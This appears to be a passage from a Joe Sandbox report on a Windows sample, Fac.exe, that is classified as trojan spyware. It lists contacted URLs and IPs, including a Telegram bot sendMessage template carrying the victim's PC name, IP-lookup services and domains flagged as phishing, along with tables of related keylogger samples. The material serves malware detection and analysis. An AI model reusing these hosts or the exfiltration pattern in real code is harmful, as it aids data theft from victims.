https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7B9AB9339B	Fac.exe, 00000002.00000002.43476613162.0000000034DB4000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E7A000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034FD7000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E19000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.google.com/	Fac.exe, 00000002.00000002.43463081751.00000000036C8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.stubdownloader.services.mozilla.com/builds/firefox-latest-ssl/en-GB/win64/b5110ff5d41570	Fac.exe, 00000002.00000002.43476613162.0000000034DB4000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E7A000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034FD7000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E19000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=enlB	Fac.exe, 00000002.00000002.43474377171.0000000033D54000.00000004.00000800.00020000.00000000.sdmp	false		high
https://secure.eicar.org/eicar.com;	Fac.exe, 00000002.00000002.43476613162.0000000034E38000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034DC0000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034F94000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E86000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034FE2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://reallyfreegeoip.org	Fac.exe, 00000002.00000002.43474377171.0000000033DEA000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43474377171.0000000033DF8000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43474377171.0000000033D8C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram	Fac.exe, 00000002.00000002.43474377171.0000000033E06000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://javadl.oracle.com/webapps/download/AutoDL?BundleId=245029_d3c52aa6bfa54d3ca74e617f18309292K	Fac.exe, 00000002.00000002.43476613162.0000000034DB4000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E7A000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034FD7000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E19000.00000004.00000800.00020000.00000000.sdmp	false		high
https://secure.eicar.org/eicar.com.txtD	Fac.exe, 00000002.00000002.43476613162.0000000034DB4000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E7A000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034FD7000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E19000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stubdownloader.services.mozilla.com/?attribution_code=c291cmNlPXd3dy5nb29nbGUuY29tJm1lZGl1bT	Fac.exe, 00000002.00000002.43476613162.0000000034DB4000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E7A000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034FD7000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E19000.00000004.00000800.00020000.00000000.sdmp	false		high
https://apis.google.com	Fac.exe, 00000002.00000003.42462884484.0000000003785000.00000004.00000020.00020000.00000000.sdmp, Fac.exe, 00000002.00000003.42462765837.0000000003740000.00000004.00000020.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/191.96.150.191$	Fac.exe, 00000002.00000002.43474377171.0000000033DEA000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43474377171.0000000033DF8000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43474377171.0000000033D8C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.com	Fac.exe, 00000002.00000002.43474377171.0000000033DEA000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43474377171.0000000033DF8000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43474377171.0000000033D8C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ocsp.quovadisoffshore.com0	Fac.exe, 00000002.00000003.42495878855.0000000003740000.00000004.00000020.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43463081751.000000000373A000.00000004.00000020.00020000.00000000.sdmp, Fac.exe, 00000002.00000003.42462765837.0000000003740000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Fac.exe, 00000002.00000002.43474377171.0000000033C31000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/	Fac.exe, 00000002.00000002.43474377171.0000000033C7E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.office.com/	Fac.exe, 00000002.00000002.43474377171.0000000033D8C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	Fac.exe, 00000002.00000002.43476613162.0000000034C56000.00000004.00000800.00020000.00000000.sdmp	false		high
https://secure.eicar.org/eicar.com	Fac.exe, 00000002.00000002.43476613162.0000000034DA8000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034FCA000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E6E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.autoitscript.com/cgi-bin/getfile.pl?autoit3/autoit-v3-setup.exe	Fac.exe, 00000002.00000002.43476613162.0000000034DB4000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E7A000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034FD7000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E19000.00000004.00000800.00020000.00000000.sdmp	false		high
https://packetstormsecurity.com/files/download/22459/BIOS320.EXE	Fac.exe, 00000002.00000002.43474377171.0000000033D8C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Fac.exe, 00000002.00000002.43476613162.0000000034C56000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.usercontent.google.com/	Fac.exe, 00000002.00000003.42495878855.0000000003740000.00000004.00000020.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43463081751.000000000373A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org	Fac.exe, 00000002.00000002.43474377171.0000000033DEA000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43474377171.0000000033DF8000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43474377171.0000000033D8C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	Fac.exe	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=	Fac.exe, 00000002.00000002.43474377171.0000000033CFC000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43474377171.0000000033E06000.00000004.00000800.00020000.00000000.sdmp	false		high
https://secure.eicar.org/eicar.com.txt/	Fac.exe, 00000002.00000002.43476613162.0000000034DA8000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034FCA000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E6E000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E02000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/search?q=eicar	Fac.exe, 00000002.00000002.43476613162.0000000034E6E000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034FE2000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E02000.00000004.00000800.00020000.00000000.sdmp	false		high
https://secure.eicar.org/eicar.com/	Fac.exe, 00000002.00000002.43476613162.0000000034DA8000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034FCA000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E6E000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E02000.00000004.00000800.00020000.00000000.sdmp	false		high
http://aborters.duckdns.org:8081	Fac.exe, 00000002.00000002.43474377171.0000000033C31000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://www.autoitscript.com/site/autoit/downloads/	Fac.exe, 00000002.00000002.43474377171.0000000033D8C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.eicar.org/download-anti-malware-testfile/Download	Fac.exe, 00000002.00000002.43476613162.0000000034DA8000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034FCA000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E6E000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E02000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.eicar.org/download-anti-malware-testfile/	Fac.exe, 00000002.00000002.43474377171.0000000033D8C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://packetstormsecurity.com/	Fac.exe, 00000002.00000002.43474377171.0000000033D8C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anotherarmy.dns.army:8081	Fac.exe, 00000002.00000002.43474377171.0000000033C31000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://www.eicar.org/	Fac.exe, 00000002.00000002.43474377171.0000000033D8C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org	Fac.exe, 00000002.00000002.43474377171.0000000033DEA000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43474377171.0000000033DF8000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43474377171.0000000033D8C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.quovadis.bm0	Fac.exe, 00000002.00000003.42495878855.0000000003740000.00000004.00000020.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43463081751.000000000373A000.00000004.00000020.00020000.00000000.sdmp, Fac.exe, 00000002.00000003.42462765837.0000000003740000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.autoitscript.com/files/autoit3/autoit-v3-setup.exeQ	Fac.exe, 00000002.00000002.43476613162.0000000034DB4000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E7A000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034FD7000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E19000.00000004.00000800.00020000.00000000.sdmp	false		high
https://packetstormsecurity.com/files/22459/BIOS320.EXE.html	Fac.exe, 00000002.00000002.43474377171.0000000033D8C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://api.telegram.org	Fac.exe, 00000002.00000002.43474377171.0000000033E06000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.eicar.org/https://eicar.org/https://www.eicar.org/download-anti-malware-testfile/https:/	Fac.exe, 00000002.00000002.43476613162.0000000034DB4000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E7A000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034FD7000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E19000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/	Fac.exe, 00000002.00000002.43474377171.0000000033D8C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:855271%0D%0ADate%20a	Fac.exe, 00000002.00000002.43474377171.0000000033E06000.00000004.00000800.00020000.00000000.sdmp	false		high
https://secure.eicar.org/eicar.com.txt	Fac.exe, 00000002.00000002.43476613162.0000000034E38000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034DA8000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034FCA000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034DC0000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034F94000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E86000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E6E000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034FE2000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
142.251.41.14	drive.google.com	United States	15169	GOOGLEUS	false
104.21.67.152	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
193.122.6.168	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false
142.250.72.97	drive.usercontent.google.com	United States	15169	GOOGLEUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1557697
Start date and time:	2024-11-18 14:50:46 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 48s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Number of analysed new started processes analysed:	3
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Fac.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/6@5/5
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 98% Number of executed functions: 166 Number of non-executed functions: 165
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Fac.exe

Simulations

Behavior and APIs

Time	Type	Description
08:53:25	API Interceptor	774797x Sleep call for process: Fac.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	New Order Data sheet Page.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse
	Factura Honorarios 2024-11-17.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	DHL Packing list.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Enclosed Offer.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse
	Pedido_335_20241112_614171.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	PO-000041522.exe	Get hash	malicious	Snake Keylogger	Browse
	Wire slip account payable.pif.exe	Get hash	malicious	AgentTesla	Browse
	Aral#U0131k PO# IRON-TE-18024 _323282-_563028621286 pdf .exe	Get hash	malicious	VIP Keylogger	Browse
104.21.67.152	ALI HASSO - P02515 & P02518.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	g1TLK7mbZD.img	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Justificante de pago.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	dg_official01.exe	Get hash	malicious	GuLoader	Browse
	FedEx Shipping Confirmation.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	New Order.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	HSBC Advice_ACH Credit.com.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	New Order.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	Quotation No.VFLOIPS31052024-1_PDF.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse
	Revised PI_2024.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
193.122.6.168	Factura Honorarios 2024-11-17.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	Ref#150062.vbe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	DHL Packing list.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Enclosed Offer.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	RE Invoice Request (Nov 2024).exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	Solicitud de cotizacion Stro1268975.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Aral#U0131k PO# IRON-TE-18024 _323282-_563028621286 pdf .exe	Get hash	malicious	VIP Keylogger	Browse	checkip.dyndns.org/
	rFACTURASALBARANESPENDIENTES.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	rCEMG242598.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	Order88983273293729387293828PDF.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
checkip.dyndns.com	New Order Data sheet Page.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.130.0
	Factura Honorarios 2024-11-17.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.6.168
	Ref#150062.vbe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	DHL Packing list.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	Enclosed Offer.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.6.168
	Pedido_335_20241112_614171.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	PO-000041522.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	RE Invoice Request (Nov 2024).exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.6.168
	Solicitud de cotizacion Stro1268975.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
reallyfreegeoip.org	New Order Data sheet Page.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.97.3
	Factura Honorarios 2024-11-17.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	Ref#150062.vbe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
	DHL Packing list.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Enclosed Offer.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.97.3
	Pedido_335_20241112_614171.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	PO-000041522.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	RE Invoice Request (Nov 2024).exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.96.3
	Solicitud de cotizacion Stro1268975.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
api.telegram.org	New Order Data sheet Page.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	Factura Honorarios 2024-11-17.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	DHL Packing list.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Enclosed Offer.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	Pedido_335_20241112_614171.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	PO-000041522.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	Wire slip account payable.pif.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	Aral#U0131k PO# IRON-TE-18024 _323282-_563028621286 pdf .exe	Get hash	malicious	VIP Keylogger	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ORACLE-BMC-31898US	New Order Data sheet Page.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.130.0
	Factura Honorarios 2024-11-17.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.6.168
	Ref#150062.vbe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	DHL Packing list.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	Enclosed Offer.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.6.168
	PO-000041522.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	RE Invoice Request (Nov 2024).exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.6.168
	Solicitud de cotizacion Stro1268975.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	Aral#U0131k PO# IRON-TE-18024 _323282-_563028621286 pdf .exe	Get hash	malicious	VIP Keylogger	Browse	193.122.6.168
TELEGRAMRU	New Order Data sheet Page.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	Factura Honorarios 2024-11-17.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	DHL Packing list.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Enclosed Offer.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	Pedido_335_20241112_614171.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	PO-000041522.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	Wire slip account payable.pif.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	Aral#U0131k PO# IRON-TE-18024 _323282-_563028621286 pdf .exe	Get hash	malicious	VIP Keylogger	Browse	149.154.167.220
CLOUDFLARENETUS	phish_alert_sp1_1.0.0.0(1).eml	Get hash	malicious	KnowBe4	Browse	104.17.24.14
	https://spotfypremium.com/spotify-premium-apk-for-pc/	Get hash	malicious	Unknown	Browse	188.114.97.3
	voi.bat	Get hash	malicious	Unknown	Browse	104.16.230.132
	urkOkB0BdX.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.74.152
	8F0oMWUhg7.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205
	bPRQRIfbbq.exe	Get hash	malicious	Unknown	Browse	104.16.123.96
	New Order Data sheet Page.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.97.3
	https://tipicopisco.com/go/bebek.txt	Get hash	malicious	Unknown	Browse	1.1.1.1
	bPRQRIfbbq.exe	Get hash	malicious	Unknown	Browse	172.67.69.226
	AD6dpKQm7n.exe	Get hash	malicious	Unknown	Browse	104.16.124.96

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	New Order Data sheet Page.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.67.152
	Factura Honorarios 2024-11-17.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.67.152
	Ref#150062.vbe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
	DHL Packing list.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	Enclosed Offer.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.67.152
	Pedido_335_20241112_614171.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	PO-000041522.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	RE Invoice Request (Nov 2024).exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.67.152
	Solicitud de cotizacion Stro1268975.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
3b5074b1b5d032e5620f69f9f700ff0e	phish_alert_sp1_1.0.0.0(1).eml	Get hash	malicious	KnowBe4	Browse	149.154.167.220
	voi.bat	Get hash	malicious	Unknown	Browse	149.154.167.220
	bPRQRIfbbq.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	New Order Data sheet Page.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	http://dailyfragrancedeals.com	Get hash	malicious	Unknown	Browse	149.154.167.220
	bPRQRIfbbq.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	AD6dpKQm7n.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	https://deina.kinsta.cloud/wp-content/upgrade/ddprojet	Get hash	malicious	Unknown	Browse	149.154.167.220
	AD6dpKQm7n.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	emes.bat	Get hash	malicious	Unknown	Browse	149.154.167.220
37f463bf4616ecd445d4a1937da06e19	urkOkB0BdX.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	142.251.41.14 142.250.72.97
	8F0oMWUhg7.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	142.251.41.14 142.250.72.97
	P6uSqL3TTL.exe	Get hash	malicious	GhostRat, Mimikatz, Nitol	Browse	142.251.41.14 142.250.72.97
	Factura Honorarios 2024-11-17.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	142.251.41.14 142.250.72.97
	Richiesta Proposta (MACHINES ITALIA) 18-11-2024#U00b7pdf.vbs	Get hash	malicious	Remcos, GuLoader	Browse	142.251.41.14 142.250.72.97
	Unlock_Tool_v2.6.5.exe	Get hash	malicious	Stealc, Vidar	Browse	142.251.41.14 142.250.72.97
	DHL_Shipping_Invoices_Awb_BL_000000000111820242247820020031808174Global180030011182024.vbs	Get hash	malicious	GuLoader, Remcos	Browse	142.251.41.14 142.250.72.97
	rBankRemittance_pdf.scr.exe	Get hash	malicious	Remcos, GuLoader	Browse	142.251.41.14 142.250.72.97
	rCEMG242598.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	142.251.41.14 142.250.72.97

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nsr797A.tmp\System.dll	Factura Honorarios 2024-11-17.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	rCEMG242598.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	SBSLMD5qhm.msi	Get hash	malicious	Metasploit	Browse
	mU4lYkmS6K.exe	Get hash	malicious	CobaltStrike	Browse
	SBSLMD5qhm.msi	Get hash	malicious	Metasploit	Browse
	mU4lYkmS6K.exe	Get hash	malicious	CobaltStrike	Browse
	TouchEn_nxKey_32bit.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Riskware.OfferCore.11979.8662.exe	Get hash	malicious	PrivateLoader, PureLog Stealer	Browse
	SecuriteInfo.com.Riskware.OfferCore.11979.8662.exe	Get hash	malicious	PrivateLoader, PureLog Stealer	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\nsr797A.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\Fac.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
